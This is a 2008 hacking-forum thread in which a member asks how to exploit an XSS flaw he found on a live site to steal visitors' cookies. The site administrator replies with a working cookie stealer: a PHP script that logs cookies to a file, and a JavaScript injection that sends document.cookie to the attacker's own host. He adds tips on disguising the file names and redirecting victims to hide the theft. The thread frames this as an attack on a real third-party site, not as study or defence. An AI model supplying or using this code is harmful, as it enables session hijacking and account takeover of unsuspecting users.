ThisisLegal.com

ThisisLegal Forums

Welcome to the forums! A chance for site members to chat and get help.

You are not logged in.

#1 2008-08-26 21:23:40

sam207
Member
Registered: 2008-03-17
Posts: 90

How to steal cookie

hello there, I found a site with xss vulnerability. Now i need to steal the cookie using javascript. So how can I do this? I have no idea. Please can u give the codes here. PHP andjs both please to steal the cookie and write in the remote log file.
Thanks..


Offline due to lack of time...

Offline

#2 2008-08-27 04:29:09

t0mmy9
Administrator
Registered: 2005-01-07
Posts: 21

Re: How to steal cookie

Youve been busy lately biggrin<br />ok, you need your own host with php support. A cookie stealer is made up of a sender and a receiver. Here is the receiver code for your php file:<br /><br />

<?php                                                                 <br />$cookie = $HTTP_GET_VARS["cookie"];                <br />$file = fopen('cookielog.txt', 'a');                        <br />fwrite($file, $cookie . "

");                           <br />?>

<br /><br />that will create a log on your site called cookielog.txt but that can be renamed to anything. next the js receiver:<br /><br />

<script language="JavaScript"><br />document.location="http://www.yoursite.com/stealer.php?cookie=" + document.cookie; <br /></script>

<br /><br />which again assumes your php file is called stealer.php, change it to fit. Add that to the site and as soon as it loads, the cookie is stolen. You might want to change the names to make it less obvious though and make the stealer page redirect them to google or somewhere.<br /><br />Edit: This was a pretty good question to ask, i might make a tutorial out of this soon.


Site admin

Offline

#3 2008-09-09 02:23:42

sam207
Member
Registered: 2008-03-17
Posts: 90

Re: How to steal cookie

Hey thanks there for it.. have been busy with my study so was unable to come here on the site. Thanks anyway..


Offline due to lack of time...

Offline

Board footer

Powered by FluxBB